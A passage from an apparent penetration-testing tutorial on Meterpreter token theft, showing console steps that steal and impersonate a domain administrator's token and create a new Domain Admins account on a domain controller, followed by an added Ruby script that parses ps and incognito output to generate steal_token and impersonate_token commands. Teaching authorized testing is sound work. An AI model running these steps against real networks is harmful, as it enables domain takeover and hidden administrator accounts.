Chapter 6
As shown in the following listing, we leverage steal_token and the PID (380 in this case) to steal the token of that user and assume the role of the domain administrator:
meterpreter > steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >
We have successfully impersonated the domain administrator account, and Meterpreter is now running under the context of that user.
In some cases, ps may not list a process running as a domain administrator. We can leverage incognito to list the available tokens on the system as well. When performing a penetration test, we should check the output of both ps and incognito, because the results may vary.
We load incognito with use incognito and then list tokens with list_tokens -u. Looking through the list of tokens, we see the SNEAKS.IN\ihazdomainadmin user account. Now we can pretend to be someone else.
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
As shown in the next listing, we successfully impersonate the ihazdomainadmin token and add a user account, which we then give domain administrator rights. (Be sure to use two backslashes, \\, when entering the DOMAIN\USERNAME.) Our domain controller is 192.168.33.50. Note the "[+] Delegation token available" line in the output: only a delegation-level token can be used to authenticate to another host on the network, so the add_user and add_group_user commands that follow, which run against the domain controller, would fail with an impersonation-level token.
meterpreter > impersonate_token SNEAKS.IN\\ihazdomainadmin
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller 192.168.33.50
[+] Successfully added user to group
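The text recommends checking both ps and list_tokens -u, and it depends on two details that are easy to get wrong at the console: the DOMAIN\USERNAME passed to impersonate_token needs a doubled backslash, and only a delegation-level token will work for the add_user / add_group_user steps against the domain controller. The following Ruby script is an added example, not code from the book or from Metasploit; it parses constructed captures of the two listings (modelled on the output shown above, with one extra impersonation-only token, SNEAKS.IN\svc_backup, invented to exercise that branch), picks the steal_token and impersonate_token commands for a target domain, and flags the two failure modes: an impersonation-only token that will not authenticate to the DC, and a session that is not yet SYSTEM and so may not see every token. TARGET_DOMAIN and the sample captures are assumptions.

```ruby
# Added example (not from the book): offline triage of Meterpreter `ps` and
# incognito `list_tokens -u` output to choose a token to steal or impersonate.

TARGET_DOMAIN = "SNEAKS.IN"   # assumption: the domain whose admins we are after

# A `DOMAIN\user` account field: exactly one backslash, so file paths never match.
ACCOUNT_RE = /\A(?:NT AUTHORITY|NT SERVICE|[\w.-]+)\\[^\\]+\z/i

# Constructed sample of `ps` output (Meterpreter's table separates columns with
# two or more spaces, which is what the parser relies on).
PS_OUTPUT = <<~PS
  PID   PPID  Name              Arch  Session  User                            Path
  ---   ----  ----              ----  -------  ----                            ----
  0     0     [System Process]
  4     0     System            x86   0        NT AUTHORITY\\SYSTEM
  380   580   explorer.exe      x86   1        SNEAKS.IN\\ihazdomainadmin       C:\\Windows\\explorer.exe
  1212  580   svchost.exe       x86   0        NT AUTHORITY\\NETWORK SERVICE    C:\\Windows\\System32\\svchost.exe
  2044  580   notepad.exe       x86   1        IHAZSECURITY\\Administrator      C:\\Windows\\System32\\notepad.exe
PS

# Constructed sample of `list_tokens -u`, including the non-SYSTEM warning and
# an invented impersonation-only domain token (SNEAKS.IN\svc_backup).
TOKENS_OUTPUT = <<~TOK
  [-] Warning: Not currently running as SYSTEM, not all tokens will be available
  Call rev2self if primary process token is SYSTEM

  Delegation Tokens Available
  ========================================
  SNEAKS.IN\\ihazdomainadmin
  IHAZSECURITY\\Administrator
  NT AUTHORITY\\LOCAL SERVICE
  NT AUTHORITY\\NETWORK SERVICE
  NT AUTHORITY\\SYSTEM

  Impersonation Tokens Available
  ========================================
  NT AUTHORITY\\ANONYMOUS LOGON
  SNEAKS.IN\\svc_backup
TOK

# Returns [[pid, "DOMAIN\\user"], ...] for every ps row that shows an owner.
def parse_ps(text)
  text.each_line.filter_map do |line|
    fields = line.strip.split(/\s{2,}/)
    next unless fields[0] =~ /\A\d+\z/          # skip header and separator rows
    account = fields.find { |f| f.match?(ACCOUNT_RE) }
    [fields[0].to_i, account] if account
  end
end

# Returns { warning: bool, delegation: [accounts], impersonation: [accounts] }.
def parse_tokens(text)
  result = { warning: false, delegation: [], impersonation: [] }
  section = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?("=")
    if line.start_with?("[-] Warning")
      result[:warning] = true
    elsif line =~ /\A(Delegation|Impersonation) Tokens Available/i
      section = $1.downcase.to_sym
    elsif section && line.match?(ACCOUNT_RE)
      result[section] << line
    end
  end
  result
end

def in_domain?(account, domain)
  account.split("\\", 2).first.casecmp?(domain)
end

# Builds the next Meterpreter commands: steal_token for live processes owned by
# a target-domain user, impersonate_token (backslash doubled for the console)
# for delegation tokens, plus notes on tokens that will not reach the DC and on
# a non-SYSTEM session that may be hiding tokens.
def plan(ps_text, tokens_text, domain = TARGET_DOMAIN)
  commands = []
  parse_ps(ps_text).each do |pid, account|
    commands << "steal_token #{pid}   # #{account}" if in_domain?(account, domain)
  end
  tokens = parse_tokens(tokens_text)
  tokens[:delegation].each do |acct|
    next unless in_domain?(acct, domain)
    d, user = acct.split("\\", 2)
    commands << "impersonate_token #{d}\\\\#{user}"
  end
  notes = []
  local_only = tokens[:impersonation].select { |a| in_domain?(a, domain) }
  unless local_only.empty?
    notes << "#{local_only.join(', ')}: impersonation-level only; usable on this host " \
             "but not for network authentication, so add_user -h against the DC will fail"
  end
  if commands.empty? && tokens[:warning]
    notes << "no usable #{domain} token found and list_tokens warned the session is not " \
             "SYSTEM: run getsystem (or migrate into a SYSTEM process) and list_tokens -u again"
  end
  { commands: commands, notes: notes }
end

if __FILE__ == $0
  result = plan(PS_OUTPUT, TOKENS_OUTPUT)
  result[:commands].each { |c| puts "meterpreter > #{c}" }
  result[:notes].each { |n| puts "[!] #{n}" }
end
```

Running it against the sample captures yields steal_token 380 (the explorer.exe process owned by SNEAKS.IN\ihazdomainadmin) and impersonate_token SNEAKS.IN\\ihazdomainadmin as the two options, and a note that SNEAKS.IN\svc_backup is impersonation-level only. Pointing it at a domain with no hits while the SYSTEM warning is present produces the "getsystem first" advice instead, which is the order a tester should actually follow before concluding that no domain token exists on the host.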